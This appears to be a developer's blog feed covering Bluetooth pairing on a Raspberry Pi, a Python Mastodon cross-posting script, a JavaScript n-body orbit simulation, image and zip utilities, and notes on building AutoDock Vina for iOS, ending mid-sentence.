feed.items.forEach(function(entry) {
if (countPosts < count_lim) {
var skip = false
for(var i = 0; i < ignore_tags.length; i++) {
if (entry.title.includes(ignore_tags[i])){
var skip = true
} else if (entry.content.includes(ignore_tags[i])){
var skip = true
}
}
if (!skip) {
var node = document.createElement("div");
node.classList.add("card","mb-3");
var row = document.createElement("div")
row.classList.add("row","no-gutters")
if (config_extra["left-column"]){
var left_col = document.createElement("div")
left_col.classList.add("col-md-2")
var left_col_body = document.createElement("div")
left_col_body.classList.add("card-body")
}
var right_col = document.createElement("div")
if (config_extra["left-column"]){
right_col.classList.add("col-md-10")
}
var node_title = document.createElement("h5")
node_title.classList.add("card-header")
node_title.innerHTML = entry.title
node_body = document.createElement("div")
node_body.classList.add("card-body")
node_content = document.createElement("p")
if (show_summary){
node_content.innerHTML = entry.content
}
node_content.classList.add("card-text")
if (config_extra["direct-link"]){
node_link = document.createElement("p")
node_link.classList.add("card-text")
node_link.innerHTML = "<b>Link:</b> <a href='" + entry.link +"'>Direct Link</a>"
if (config_extra["left-column"]){
left_col_body.appendChild(node_link)
} else {
node_content.appendChild(node_link)
}
}
if (config_extra["show-date"]){
node_date = document.createElement("p")
node_date.classList.add("card-text")
node_date.innerHTML = "<p><b>Date: </b>" + entry.pubDate + "</p>"
if (config_extra["left-column"]){
left_col_body.appendChild(node_date)
} else {
node_content.appendChild(node_date)
}
}
node.appendChild(node_title)
node_body.appendChild(node_content)
right_col.appendChild(node_body)
if (config_extra["left-column"]){
left_col.appendChild(left_col_body)
row.appendChild(left_col)
}
row.appendChild(right_col)
node.appendChild(row)
document.getElementById(key).appendChild(node)
countPosts+=1
}
}
})
if (config_extra["Responsive-Images"]){
var inputs = document.getElementsByTagName('img')
for(var i = 0; i < inputs.length; i++) {
inputs[i].classList.add("img-fluid")
}
}
})
return true
}
(async () => {
for(var key in feeds) {
let result = await myfunc(key);
}})();
</script>
<noscript>Uh Oh! Your browser does not support JavaScript or JavaScript is currently disabled. Please enable JavaScript or switch to a different browser.</noscript>
</body></html>
This was tested on a Raspberry Pi Zero W
pi@raspberrypi:~ $ bluetoothctl
[bluetooth]# agent on
[bluetooth]# default-agent
[bluetooth]# scan on
While still in bluetoothctl, once the scan lists your device's MAC address, pair with it:
[bluetooth]# pair XX:XX:XX:XX:XX:XX
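After pairing, you will usually also want to trust and connect to the device so it reconnects automatically (the MAC address is a placeholder):
[bluetooth]# trust XX:XX:XX:XX:XX:XX
[bluetooth]# connect XX:XX:XX:XX:XX:XX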
To exit out of bluetoothctl at any time, just type exit
]]>What is better than posting a blog post? Posting about your posting pipeline. I did this previously with Twitter.
mastodon.social does not support any formatting in status posts. Yes, there are other instances which have patches enabling features such as Markdown formatting, but there is no upstream support.
My website is built using a really simple static site generator I wrote in Python. Therefore, each post is self-contained in a Markdown file with the necessary metadata.
I am going to specify the path to the blog post, parse it and then publish it.
I initially planned on having a command line parser and some more flags.
I ended up using mastodon.py rather than crafting requests by hand. Each status_post/toot call returns a status id that can then be used as the in_reply_to_id parameter for the next toot in the thread.
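As a minimal sketch of that idea (the access token here is a placeholder):
from mastodon import Mastodon

mastodon = Mastodon(access_token="...", api_base_url="https://mastodon.social")
first = mastodon.status_post("First toot in the thread")
mastodon.status_post("Second toot", in_reply_to_id=first.id)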
For the code snippets, seeing that Mastodon does not support native formatting, I am resorting to using ray-so.
I am using a bunch of regex hacks and reading the blog post line by line. Because there is no Markdown support, I append all the links to the end of the toot. For images, I upload them and attach them to the toot. The initial toot is generated based on the title and the tags associated with the post.
# Regexes I am using
markdown_image = r'(?:!\[(.*?)\]\((.*?)\))'
markdown_links = r'(?:\[(.*?)\]\((.*?)\))'
tags_within_metadata = r"tags: ([\w,\s]+)"
metadata_regex = r"---\s*\n(.*?)\n---\s*\n"
This is useful when I want to get the exact data I want. In this case, I can extract the tags from the front matter.
metadata = re.search(metadata_regex, markdown_content, re.DOTALL)
if metadata:
tags_match = re.search(r"tags: ([\w,\s]+)", metadata.group(1))
if tags_match:
tags = tags_match.group(1).split(",")
I am running akashrchandran/Rayso-API.
import requests
def get_image(code, language: str = "python", title: str = "Code Snippet"):
params = (
('code', code),
('language', language),
('title', title),
)
response = requests.get('http://localhost:3000/api', params=params)
return response.content
Even though Mastodon officially has a higher character limit than Twitter, I prefer the way threads look.
Everything does seem to work, seeing that you are reading this on Mastodon and that I have updated this section.
Here is the current code:
from mastodon import Mastodon
from mastodon.errors import MastodonAPIError
import requests
import re
mastodon = Mastodon(
access_token='reeeeee',
api_base_url="https://mastodon.social"
)
url_base = "https://web.navan.dev"
sample_markdown_file = "Content/posts/2022-12-25-blog-to-toot.md"
tags = []
toots = []
image_idx = 0
markdown_image = r'(?:!\[(.*?)\]\((.*?)\))'
markdown_links = r'(?:\[(.*?)\]\((.*?)\))'
def get_image(code, language: str = "python", title: str = "Code Snippet"):
params = (
('code', code),
('language', language),
('title', title),
)
response = requests.get('http://localhost:3000/api', params=params)
return response.content
class TootContent:
def __init__(self, text: str = ""):
self.text = text
self.images = []
self.links = []
self.image_count = len(self.images)
def __str__(self):
toot_text = self.text
for link in self.links:
toot_text += " " + link
return toot_text
def get_text(self):
toot_text = self.text
for link in self.links:
toot_text += " " + link
return toot_text
def get_length(self):
length = len(self.text)
for link in self.links:
length += 23
return length
def add_link(self, link):
if len(self.text) + 23 < 498:
if link[0].lower() != 'h':
link = url_base + link
self.links.append(link)
return True
return False
def add_image(self, image):
if len(self.images) == 4:
# will handle in future
print("cannot upload more than 4 images per toot")
exit(1)
# upload image and get id
self.images.append(image)
self.image_count = len(self.images)
def add_text(self, text):
if len(self.text + text) > 400:
return False
else:
self.text += f" {text}"
return True
def get_links(self):
print(len(self.links))
in_metadata = False
in_code_block = False
my_toots = []
text = ""
images = []
image_links = []
extra_links = []
tags = []
code_block = ""
language = "bash"
current_toot = TootContent()
metadata_regex = r"---\s*\n(.*?)\n---\s*\n"
with open(sample_markdown_file) as f:
markdown_content = f.read()
metadata = re.search(metadata_regex, markdown_content, re.DOTALL)
if metadata:
tags_match = re.search(r"tags: ([\w,\s]+)", metadata.group(1))
if tags_match:
tags = tags_match.group(1).split(",")
markdown_content = markdown_content.rsplit("---\n",1)[-1].strip()
for line in markdown_content.split("\n"):
if current_toot.get_length() < 400:
if line.strip() == '':
continue
if line[0] == '#':
line = line.replace("#", "").strip()
if len(my_toots) == 0:
current_toot.add_text(
f"{line}: a cross-posted blog post \n"
)
hashtags = ""
for tag in tags:
hashtags += f"#{tag.strip()},"
current_toot.add_text(hashtags[:-1])
my_toots.append(current_toot)
current_toot = TootContent()
else:
my_toots.append(current_toot)
current_toot = TootContent(text=f"{line.title()}:")
continue
else:
if "```" in line:
in_code_block = not in_code_block
if in_code_block:
language = line.strip().replace("```",'')
continue
else:
with open(f"code-snipped_{image_idx}.png","wb") as f:
f.write(get_image(code_block, language))
current_toot.add_image(f"code-snipped_{image_idx}.png")
image_idx += 1
code_block = ""
continue
if in_code_block:
line = line.replace(" ","\t")
code_block += line + "\n"
continue
if len(re.findall(markdown_image, line)) > 0:
for image_link in re.findall(markdown_image, line):
image_links.append(image_link[1])
# not handled yet
line = re.sub(markdown_image, "", line)
if len(re.findall(markdown_links,line)) > 0:
for link in re.findall(markdown_links, line):
if not (current_toot.add_link(link[1])):
extra_links.append(link[1])
line = line.replace(f'[{link[0]}]({link[1]})',link[0])
if not current_toot.add_text(line):
my_toots.append(current_toot)
current_toot = TootContent(line)
else:
my_toots.append(current_toot)
current_toot = TootContent()
my_toots.append(current_toot)
in_reply_to_id = None
for toot in my_toots:
image_ids = []
for image in toot.images:
print(f"uploading image, {image}")
try:
image_id = mastodon.media_post(image)
image_ids.append(image_id.id)
except MastodonAPIError:
print("failed to upload. Continuing...")
if image_ids == []:
image_ids = None
in_reply_to_id = mastodon.status_post(
toot.get_text(), in_reply_to_id=in_reply_to_id, media_ids=image_ids
).id
Not the best thing I have ever written, but it works!
]]>This post requires JavaScript to be viewed properly :(
Adapted from the Numerics Tutorial - kirklong/ThreeBodyBot. The Julia code has been rewritten in JavaScript.
Workflow:
To work around memory issues, the simulations are only run on demand when the user clicks the respective button. Scroll down to the bottom of the page to see the results.
The n-body problem is a classic puzzle in physics (and thus astrophysics) and mathematics that deals with predicting the motion of multiple celestial objects that interact with each other through gravitational forces.
Imagine you are observing a cosmic dance between multiple celestial bodies, all tugging on one another as they move through space. The n-body problem aims to understand and predict the paths of these objects as they move through space.
When n=2, i.e. we have only two objects, say the Earth and the Moon, we can easily apply Newtonian physics to predict their motion. However, when n>2, the problem becomes much more difficult to solve analytically.[1] This is because each object feels the gravitational pull from all other objects, and thus the equations of motion become coupled and non-linear.
As the number of objects increases, finding an exact solution becomes impossible, and we rely on numerical approximations.
If we want to create an n-body simulation in our browser, we need to figure out how we are going to visualise the motion of the objects. There are a few ways to do this, but the easiest is to use Plotly.js, a JavaScript library for creating interactive graphs. (An alternative is to use the HTML5 canvas element.)
/*
* Earth - Sun Orbit Plot
* Taken from Numerics tutorial
*/
const G = 6.67e-11;
const Msun = 2e30;
const AU = 1.5e11;
const v0 = Math.sqrt(G * Msun / AU); // SI
function dR(r, v) {
const dv = [-G * Msun / Math.pow(r[0] ** 2 + r[1] ** 2, 3 / 2) * r[0], -G * Msun / Math.pow(r[0] ** 2 + r[1] ** 2, 3 / 2) * r[1]];
const dr = [...v];
return [dr, dv];
}
// initialize system
let r = [-AU, 0];
const theta = Math.atan2(r[1], r[0]);
let v = [-v0 * Math.sin(theta), v0 * Math.cos(theta)];
const t = Array.from({ length: 1001 }, (_, i) => i / 100 + 0.0); // years
const yearSec = 365 * 24 * 3600;
const dt = (t[1] - t[0]) * yearSec; // s
const x4Plot = Array.from({ length: t.length }, () => 0);
const y4Plot = Array.from({ length: t.length }, () => 0);
// integrate using RK4!
for (let i = 0; i < t.length; i++) {
const k1 = dR(r, v).map(x => x.map(y => y * dt));
const k2 = dR(r.map((ri, j) => ri + k1[0][j] / 2), v.map((vi, j) => vi + k1[1][j] / 2)).map(x => x.map(y => y * dt));
const k3 = dR(r.map((ri, j) => ri + k2[0][j] / 2), v.map((vi, j) => vi + k2[1][j] / 2)).map(x => x.map(y => y * dt));
const k4 = dR(r.map((ri, j) => ri + k3[0][j]), v.map((vi, j) => vi + k3[1][j])).map(x => x.map(y => y * dt));
r = r.map((ri, j) => ri + (k1[0][j] + 2 * k2[0][j] + 2 * k3[0][j] + k4[0][j]) / 6);
v = v.map((vi, j) => vi + (k1[1][j] + 2 * k2[1][j] + 2 * k3[1][j] + k4[1][j]) / 6);
x4Plot[i] = r[0];
y4Plot[i] = r[1];
}
// make data for plot
var sun = { x: 0, y: 0 };
const earth = { x: x4Plot.map(x => x / AU), y: y4Plot.map(y => y / AU) };
const circle = { x: Array.from({ length: 1001 }, (_, i) => Math.cos(i / 100 * 2 * Math.PI)), y: Array.from({ length: 1001 }, (_, i) => Math.sin(i / 100 * 2 * Math.PI)) };
This code simulates the orbit of Earth around the Sun, using a numerical method called the Runge-Kutta 4th order (RK4) method.
First, we define some constants:
G: the gravitational constant (6.67e-11 N m²/kg²)
Msun: the mass of the Sun (2e30 kg)
AU: an astronomical unit, the average distance between the Earth and the Sun (1.5e11 m)
v0: the initial velocity of Earth, calculated from its distance to the Sun
Next, the function dR takes the position r and velocity v of Earth as input and returns the rate of change in position (dr) and the rate of change in velocity (dv) using the gravitational force formula.
We then initialize the position r and velocity v of Earth, and create an array t that represents time in years, divided into 1001 steps. We also define yearSec as the number of seconds in a year and dt as the time step in seconds.
Now, we integrate the Earth's motion using the RK4 method. For each time step, we calculate the rates of change for position and velocity (k1, k2, k3, k4) and update Earth's position and velocity based on these. We store the updated position in x4Plot and y4Plot.
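For reference, the textbook RK4 update the loop implements is the following (here f is the derivative function dR and h is the time step dt; in the code, h is folded into each k as it is computed):
$$k_1 = f(y_n), \quad k_2 = f\left(y_n + \tfrac{h}{2}k_1\right), \quad k_3 = f\left(y_n + \tfrac{h}{2}k_2\right), \quad k_4 = f(y_n + h\,k_3)$$
$$y_{n+1} = y_n + \tfrac{h}{6}\left(k_1 + 2k_2 + 2k_3 + k_4\right)$$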
Finally, we normalize the position data by dividing it by the astronomical unit (AU) to make it more visually meaningful. We also create a circle for reference, which represents a perfect circular orbit. The code ends with the data for the Sun's position, Earth's orbit, and the reference circle ready to be plotted.
Now that we have the data for the Sun's position, Earth's orbit, and the reference circle, we can plot them using Plotly.js.
let traceSun = {
x: [sun.x],
y: [sun.y],
mode: "markers",
marker: {
symbol: "star",
size: 10,
color: "gold",
},
name: "Sun",
};
const traceEarth = {
x: earth.x,
y: earth.y,
mode: "lines",
line: {
color: "white"
},
name: "Earth",
};
const traceOrbit = {
x: circle.x,
y:circle.y,
mode: "lines",
line: {
color: "crimson",
dash: "dash"
},
name: "1 AU Circle",
};
const earthSunLayout = {
title: "Earth-Sun Orbit",
xaxis: {
title: "x [AU]",
range: [-1.1,1.1],
showgrid: true,
gridcolor: "rgba(255,255,255,0.5)",
gridwidth: 1,
zeroline: true,
tickmode: "auto",
nticks: 5,
},
yaxis: {
title: "y [AU]",
range: [-1.1,1.1],
showgrid: true,
gridcolor: "rgba(255,255,255,0.5)",
gridwidth: 1,
zeroline: false,
tickmode: "auto",
nticks: 5,
},
margin: {
l: 50,
r: 50,
b: 50,
t: 50,
pad: 4,
},
paper_bgcolor: "black",
plot_bgcolor: "black",
};
Plotly.newPlot("plot",[traceSun,traceEarth,traceOrbit], earthSunLayout);
The figure of 8 solution[2] in the three-body problem refers to a unique and special trajectory where three celestial bodies (e.g., planets, stars) move in a figure of 8 shaped pattern around their mutual center of mass. This is special because it represents a stable and periodic solution to the three-body problem, which is known for its complexity and lack of general solutions.
In the figure of 8 solution, each of the three bodies follows the same looping path, but with a phase difference such that when one body is at one end of the loop, the other two are symmetrically positioned elsewhere along the path. The bodies maintain equal distances from each other throughout their motion, and their velocities and positions are perfectly balanced to maintain this periodic motion.
The figure of 8 is interesting because:
It is a relatively stable solution, which means that the objects continue to follow the same looping path almost indefinitely.
It breaks down the notion that no simple periodic solutions exist for the three-body problem.
It looks cool!
The code for this simulation is very similar to the Earth-Sun orbit simulation, except that we now have three bodies instead of two. We also use a different set of initial conditions to generate the figure of 8 orbit.
function deltaR(coords, masses, nBodies, G) {
let x = coords[0];
let y = coords[1];
let vx = coords[2];
let vy = coords[3];
let delta = math.clone(coords);
for (let n = 0; n < nBodies; n++) {
let xn = x[n];
let yn = y[n];
let deltaVx = 0.0;
let deltaVy = 0.0;
for (let i = 0; i < nBodies; i++) {
if (i !== n) {
let sep = Math.sqrt(Math.pow(xn - x[i], 2) + Math.pow(yn - y[i], 2)); // Euclidean distance
deltaVx -= G * masses[i] * (xn - x[i]) / Math.pow(sep, 3);
deltaVy -= G * masses[i] * (yn - y[i]) / Math.pow(sep, 3);
}
}
delta[2][n] = deltaVx;
delta[3][n] = deltaVy;
}
delta[0] = vx;
delta[1] = vy;
return delta;
}
function step(coords, masses, deltaT, nBodies = 3, G = 6.67408313131313e-11) {
let k1 = math.multiply(deltaT, deltaR(coords, masses, nBodies, G));
let k2 = math.multiply(deltaT, deltaR(math.add(coords, math.multiply(k1, 0.5)), masses, nBodies, G));
let k3 = math.multiply(deltaT, deltaR(math.add(coords, math.multiply(k2, 0.5)), masses, nBodies, G));
let k4 = math.multiply(deltaT, deltaR(math.add(coords, k3), masses, nBodies, G));
coords = math.add(coords, math.multiply(math.add(k1, math.multiply(2.0, k2), math.multiply(2.0, k3), k4), 1/6));
return coords;
}
// Initial conditions setup
let M = [1, 1, 1];
let x = [-0.97000436, 0.0, 0.97000436];
let y = [0.24208753, 0.0, -0.24208753];
let vx = [0.4662036850, -0.933240737, 0.4662036850];
let vy = [0.4323657300, -0.86473146, 0.4323657300];
let Ei = -1 / Math.sqrt(Math.pow(2 * 0.97000436, 2) + Math.pow(2 * 0.24208753, 2)) - 2 / Math.sqrt(Math.pow(0.97000436, 2) + Math.pow(0.24208753, 2)) + 0.5 * (math.sum(math.add(math.dotPow(vx, 2), math.dotPow(vy, 2))));
function linspace(start, stop, num) {
const step = (stop - start) / (num - 1);
return Array.from({length: num}, (_, i) => start + (step * i));
}
let coords = [x, y, vx, vy];
const time = linspace(0, 6.3259, 1001);
let deltaT = time[1] - time[0];
let X = math.zeros(3, time.length).toArray();
let Y = math.zeros(3, time.length).toArray();
let VX = math.zeros(3, time.length).toArray();
let VY = math.zeros(3, time.length).toArray();
for (let i = 0; i < time.length; i++) {
coords = step(coords, M, deltaT, 3, 1);
X.forEach((_, idx) => X[idx][i] = coords[0][idx]);
Y.forEach((_, idx) => Y[idx][i] = coords[1][idx]);
VX.forEach((_, idx) => VX[idx][i] = coords[2][idx]);
VY.forEach((_, idx) => VY[idx][i] = coords[3][idx]);
}
The deltaR function computes the rate of change in position and velocity of the celestial bodies based on their current positions, velocities, and masses. It accounts for the gravitational forces between all bodies.
The step function performs a single RK4 integration step, updating the positions and velocities of the celestial bodies. It uses deltaR to compute the four increments (k1, k2, k3, and k4) and then updates the coordinates accordingly.
Next, the initial conditions for the figure-8 three-body problem are set. The masses (M), initial positions (x, y), and initial velocities (vx, vy) are provided. Ei calculates the initial total energy of the system.
The linspace function is defined to create a linearly spaced array of time points. coords is an array containing the positions and velocities for all bodies. The time array is created using linspace, and deltaT is set as the time step.
X, Y, VX, and VY are 2D arrays that will store the positions and velocities of the celestial bodies over time. They are initialized with zeros and will be updated in the loop.
Finally, a loop iterates over each time step, updating the positions and velocities of the celestial bodies using the step function. The updated coordinates are stored in the X, Y, VX, and VY arrays.
Now that we have time-series data, we need to animate it. We can use Plotly's animate function, as it does not force a full re-render, saving us some precious GPU and CPU cycles when we are trying to run this in the browser itself.
function plotClassicFunc() {
var tailLength = 1;
if (plotIndex < tailLength) {
tailLength = 0;
} else if (plotIndex > time.length) {
plotIndex = 0;
} else {
tailLength = plotIndex - tailLength;
}
var currentIndex = plotIndex;
try {
time[currentIndex].toFixed(3);
} catch (e) {
currentIndex = 0;
}
const data = [
{
x: X[0].slice(tailLength, currentIndex),
y: Y[0].slice(tailLength, currentIndex),
mode: 'lines+markers',
marker: {
symbol: 'star',
size: 8,
line: { width: 0 },
},
line: {
width: 2,
},
name: '',
},
{
x: X[1].slice(tailLength, currentIndex),
y: Y[1].slice(tailLength, currentIndex),
mode: 'lines+markers',
marker: {
symbol: 'star',
size: 8,
line: { width: 0 },
},
line: {
width: 2,
},
name: '',
},
{
x: X[2].slice(tailLength, currentIndex),
y: Y[2].slice(tailLength, currentIndex),
mode: 'lines+markers',
marker: {
symbol: 'star',
size: 8,
line: { width: 0 },
},
line: {
width: 2,
},
name: '',
},
];
// width: 1000, height: 400
const layout = {
title: '∞ Three-Body Problem: t = ' + time[currentIndex].toFixed(3),
xaxis: {
title: 'x',
range: [-1.1,1.1]
},
yaxis: {
title: 'y',
scaleanchor: 'x',
scaleratio: 1,
range: [-0.5,0.5]
},
plot_bgcolor: 'black',
paper_bgcolor: 'black',
font: {
color: 'white',
},
};
try {
Plotly.animate("plot", {
data: data, layout: layout
}, {
staticPlot: true,
transition: {
duration: 0,
},
frame: {
duration: 0,
redraw: false,
}
});
} catch (err) {
Plotly.newPlot('plot', data, layout);
}
plotIndex += delay;
if (plotClassic===true) {
try {
requestAnimationFrame(plotClassicFunc);
}
catch (err) {
console.log(err)
}
}
}
function step(coords, masses, deltaT, nBodies = 3, G = 6.67408313131313e-11) {
let k1 = math.multiply(deltaT, deltaR(coords, masses, nBodies, G));
let k2 = math.multiply(deltaT, deltaR(math.add(coords, math.multiply(k1, 0.5)), masses, nBodies, G));
let k3 = math.multiply(deltaT, deltaR(math.add(coords, math.multiply(k2, 0.5)), masses, nBodies, G));
let k4 = math.multiply(deltaT, deltaR(math.add(coords, k3), masses, nBodies, G));
coords = math.add(coords, math.multiply(math.add(k1, math.multiply(2.0, k2), math.multiply(2.0, k3), k4), 1/6));
return coords;
}
function detectCollisionsEscape(coords, deltaT, maxSep) {
const [x, y, vx, vy] = coords;
const V = vx.map((v, i) => Math.sqrt(v ** 2 + vy[i] ** 2));
const R = V.map(v => v * deltaT);
let collision = false, collisionInds = null, escape = false, escapeInd = null;
for (let n = 0; n < x.length; n++) {
const rn = R[n], xn = x[n], yn = y[n];
for (let i = 0; i < x.length; i++) {
if (i !== n) {
const minSep = rn + R[i];
const sep = Math.sqrt((xn - x[i]) ** 2 + (yn - y[i]) ** 2);
if (sep < minSep) {
collision = true;
collisionInds = [n, i];
} else if (sep > maxSep) {
escape = true;
escapeInd = n;
return [collision, collisionInds, escape, escapeInd];
}
}
}
}
return [collision, collisionInds, escape, escapeInd];
}
function nBodyStep(coords, masses, deltaT, maxSep, nBodies, G = 6.67408313131313e-11) { // Similar to our step function before, but keeping track of collisions
coords = step(coords, masses, deltaT, nBodies, G); // Update the positions as we did before
//console.log(detectCollisionsEscape(coords, deltaT, maxSep));
let [collision, collisionInds, escape, escapeInd] = detectCollisionsEscape(coords, deltaT, maxSep); // Detect collisions/escapes
if (collision) { // Do inelastic collision and delete extra body (2 -> 1)
const [i1, i2] = collisionInds;
const [x1, x2] = [coords[0][i1], coords[0][i2]];
const [y1, y2] = [coords[1][i1], coords[1][i2]];
const [vx1, vx2] = [coords[2][i1], coords[2][i2]];
const [vy1, vy2] = [coords[3][i1], coords[3][i2]];
const [px1, px2] = [masses[i1] * vx1, masses[i2] * vx2];
const [py1, py2] = [masses[i1] * vy1, masses[i2] * vy2];
const px = px1 + px2;
const py = py1 + py2;
const newM = masses[i1] + masses[i2];
const vfx = px / newM;
const vfy = py / newM;
coords[0][i1] = (x1 * masses[i1] + x2 * masses[i2]) / (masses[i1] + masses[i2]); // Center of mass
coords[1][i1] = (y1 * masses[i1] + y2 * masses[i2]) / (masses[i1] + masses[i2]);
coords[2][i1] = vfx;
coords[3][i1] = vfy;
coords[0].splice(i2, 1);
coords[1].splice(i2, 1);
coords[2].splice(i2, 1);
coords[3].splice(i2, 1);
masses[i1] = newM;
masses.splice(i2, 1);
nBodies--;
}
// Could also implement condition for escape where we stop calculating forces but I'm too lazy for now
return [coords, masses, nBodies, collision, collisionInds, escape, escapeInd];
}
function uniform(min, max) {
return Math.random() * (max - min) + min;
}
function deepCopyCoordsArray(arr) {
return arr.map(innerArr => innerArr.slice());
}
function genNBodyResults(nBodies, tStop, nTPts, nBodiesStop = 10, G = 6.67408313131313e-11) {
var btn = document.getElementById("startSim3");
// Set button text to Solving
var prevText = btn.innerHTML;
btn.innerHTML = "Solving...";
let coords = [Array(nBodies).fill(0), Array(nBodies).fill(0), Array(nBodies).fill(0), Array(nBodies).fill(0)];
const Mstar = 2e30;
const Mp = Mstar / 1e4;
for (let i = 0; i < nBodies; i++) { // Initialize coordinates on ~Keplerian orbits
let accept = false;
let r = null;
while (!accept) { // Prevent a particle from spawning within 0.2 AU too close to "star"
r = Math.random() * 2 * 1.5e11; // Say radius of 2 AU
if (r / 1.5e11 > 0.2) {
accept = true;
}
}
const theta = uniform(0, 2 * Math.PI);
const x = r * Math.cos(theta);
const y = r * Math.sin(theta);
const v = Math.sqrt(G * Mstar / r);
const perturbedV = v + v / 1000 * uniform(-1, 1); // Perturb the velocities ever so slightly
const vTheta = Math.atan2(y, x);
coords[0][i] = x;
coords[1][i] = y;
coords[2][i] = -perturbedV * Math.sin(vTheta);
coords[3][i] = perturbedV * Math.cos(vTheta);
}
//console.log('Initial coords:', coords);
let masses = Array(nBodies).fill(Mp); // Initialize masses
masses[0] = Mstar; // Make index zero special as the central star
coords[0][0] = 0;
coords[1][0] = 0;
coords[2][0] = 0;
coords[3][0] = 0; // Initialize central star at origin with no velocity
const yearSec = 365 * 24 * 3600;
const time = Array.from({ length: nTPts }, (_, i) => i * tStop / (nTPts - 1) * yearSec); // Years -> s
let t = time[0];
const deltaT = time[1] - time[0];
let tInd = 0;
const coordsRecord = [deepCopyCoordsArray(coords)];
const massRecord = [masses.slice()]; // Initialize records with initial conditions
while (tInd < nTPts && nBodies > nBodiesStop) {
//console.log('Initial coords:', coords);
[coords, masses, nBodies] = nBodyStep(coords, masses, deltaT, 10 * 1.5e11, nBodies, G); // Update
coordsRecord.push(deepCopyCoordsArray(coords));
massRecord.push(masses.slice()); // Add to records
tInd++;
t = time[tInd];
//console.log(`currently at t = ${(t / yearSec).toFixed(2)} years\r`);
}
console.log(`final time = ${time[tInd] / yearSec} years with ${nBodies} bodies remaining`);
// Set button text to Start Simulation
btn.innerHTML = prevText;
return [coordsRecord, massRecord, time.slice(0, tInd + 1)];
}
var [coordsRecordR, _, tR] = genNBodyResults(256,1,1001);
//console.log(coordsRecordR);
const yearSec = 365 * 24 * 3600;
function createFrame(coordsR) {
if (!coordsR || !coordsR[0] || !coordsR[1]) {
return [];
}
const traceCentralStar = {
x: [coordsR[0][0] / 1.5e11],
y: [coordsR[1][0] / 1.5e11],
mode: 'markers',
type: 'scatter',
name: 'Central star',
marker: { color: 'gold', symbol: 'star', size: 10 },
};
const xCoords = coordsR[0].slice(1).map(x => x / 1.5e11);
const yCoords = coordsR[1].slice(1).map(y => y / 1.5e11);
const traceOtherBodies = {
x: xCoords,
y: yCoords,
mode: 'markers',
type: 'scatter',
name: '',
marker: { color: 'dodgerblue', symbol: 'circle', size: 2 },
};
return [traceCentralStar, traceOtherBodies];
}
function createLayout(i) {
return {
title: {
text: `N-Body Problem: t = ${Number(tR[i] / yearSec).toFixed(3)} years`,
x: 0.03,
y: 0.97,
xanchor: 'left',
yanchor: 'top',
font: { size: 14 },
},
xaxis: { title: 'x [AU]', range: [-2.1, 2.1] },
yaxis: { title: 'y [AU]', range: [-2.1, 2.1], scaleanchor: 'x', scaleratio: 1 },
showlegend: false,
margin: { l: 60, r: 40, t: 40, b: 40 },
width: 800,
height: 800,
plot_bgcolor: 'black',
};
}
function animateNBodyProblem() {
const nFrames = tR.length;
for (let i = 0; i < nFrames; i++) {
const frameData = createFrame(coordsRecordR[i]);
const layout = createLayout(i);
//Plotly.newPlot(plotDiv, frameData, layout);
try {
Plotly.animate("plot", {
data: frameData, layout: layout
}, {
staticPlot: true,
transition: {
duration: 0,
},
frame: {
duration: 0,
redraw: false,
}
});
} catch (err) {
Plotly.newPlot('plot', frameData, layout);
}
}
}
animateNBodyProblem();
import numpy
from PIL import Image, ImageFile
# Convert PIL Image to NumPy array
img = Image.open("foo.jpg")
arr = numpy.array(img)
# Convert array to Image
img = Image.fromarray(arr)
try:
    img.save(destination, "JPEG", quality=80, optimize=True, progressive=True)
except IOError:
    # Progressive JPEGs can need a larger encoder buffer
    ImageFile.MAXBLOCK = img.size[0] * img.size[1]
    img.save(destination, "JPEG", quality=80, optimize=True, progressive=True)
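As a quick sanity check (assuming the snippet above), the round trip through NumPy preserves the pixel data:
print(arr.shape, arr.dtype)  # e.g. (height, width, 3) uint8 for an RGB image
assert numpy.array_equal(arr, numpy.array(Image.fromarray(arr)))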
Tested on macOS
Creating the archive:
zip -r -s 5 oodlesofnoodles.zip website/
The 5 stands for each split file's size in MB (k and g suffixes can be used for KB and GB)
For encrypting the zip:
zip -er -s 5 oodlesofnoodles.zip website
Extracting Files
First we need to collect all parts, then
zip -F oodlesofnoodles.zip --out merged.zip
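After merging, the archive can be extracted as usual (unzip will prompt for the password if the archive was encrypted):
unzip merged.zip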
Why? Because I can.
makedepend is a Unix tool used to generate dependencies of C source files. Most modern programs do not use this anymore, but then again AutoDock Vina's source code hasn't been changed since 2011. The first hurdle came when I saw that there was no makedepend command, nor was there any package on any development repository for iOS. So, I tracked down the original source code for makedepend (https://github.com/DerellLicht/makedepend). According to the repository, this is actually the source code for the makedepend utility that came with some X Windows distribution back around Y2K. I am pretty sure there is a problem with my current compiler configuration, because I had to manually edit the Makefile to provide the path to the iOS SDKs using the -isysroot flag.
Original Makefile (I used the provided Mac Makefile as the base):
BASE=/usr/local
BOOST_VERSION=1_41
BOOST_INCLUDE = $(BASE)/include
C_PLATFORM=-arch i386 -arch ppc -isysroot /Developer/SDKs/MacOSX10.5.sdk -mmacosx-version-min=10.4
GPP=/usr/bin/g++
C_OPTIONS= -O3 -DNDEBUG
BOOST_LIB_VERSION=
include ../../makefile_common
I installed Boost 1.68.0-1 from Sam Bingner's repository. (Otherwise I would have had to compile Boost too 😫)
Edited Makefile
BASE=/usr
BOOST_VERSION=1_68
BOOST_INCLUDE = $(BASE)/include
C_PLATFORM=-arch arm64 -isysroot /var/sdks/Latest.sdk
GPP=/usr/bin/g++
C_OPTIONS= -O3 -DNDEBUG
BOOST_LIB_VERSION=
include ../../makefile_common
Of course, since Boost 1.41 many things have been added and deprecated, which is why I had to edit the source code to make it work with version 1.68.
../../../src/main/main.cpp:50:9: error: no matching constructor for initialization of 'path' (aka 'boost::filesystem::path')
return path(str, boost::filesystem::native);
This was an easy fix: I just commented this out and added a return statement returning the path.
return path(str);
../../../src/main/main.cpp:665:57: error: no member named 'native_file_string' in 'boost::filesystem::path'
std::cerr << "\n\nError: could not open \"" << e.name.native_file_string() << "\" for " << (e.in ? "reading" : "writing") << ".\n";
~~~~~~ ^
../../../src/main/main.cpp:677:80: error: no member named 'native_file_string' in 'boost::filesystem::path'
std::cerr << "\n\nParse error on line " << e.line << " in file \"" << e.file.native_file_string() << "\": " << e.reason << '\n';
~~~~~~ ^
2 errors generated.
Turns out native_file_string was deprecated in Boost 1.57 and replaced with just string.
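So the fix was mechanical; a sketch of the replacement (abbreviated from the error messages above):
// Before (Boost < 1.57):
std::cerr << e.name.native_file_string();
// After:
std::cerr << e.name.string();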
This one still boggles me because there was no reason for it not to work; as a workaround, I downloaded the DEB, extracted it, and used that path for compiling.
But, this time in another file, and I quickly fixed it.
Obviously it was working on my iPad, but would it work on another device? I transferred the compiled binary and
